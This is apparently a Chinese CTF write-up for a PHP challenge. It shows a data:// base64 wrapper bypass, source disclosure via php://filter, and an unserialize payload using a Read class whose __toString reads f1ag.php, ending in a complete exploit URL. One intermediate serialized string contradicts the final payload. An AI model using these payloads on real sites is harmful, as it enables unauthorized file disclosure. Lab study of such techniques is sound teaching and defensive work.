打开网页,查看源代码是这样的
首先判断是否存在一个$user,并且读取文件===the user is admin
我们可以用php伪协议读取,他就会完整的等于文件内容
data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4=
之后包含并且读取class.php
file=php://filter/read=convert.base64-encode/resource=class.php
获得文件
<?php
class Read{//f1ag.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
?>
反序列化,让file的值等于flag.php即可
<?php
class Read
{
public $file = 'f1ag.php';
}
$a = new Read();
echo serialize($a);
O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
题目不全,类似题目第三题博客
pass=O:4:“Read”:1:{s:4:“file”;s:8:“f1ag.php”;}
所以终极payload:
?user=data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4=&file=class.php&pass=O:4:%22Read%22:1:{s:4:%22file%22;s:8:%22f1ag.php%22;}
flag就出来了,flag在源码里
今天就到这了,溜溜球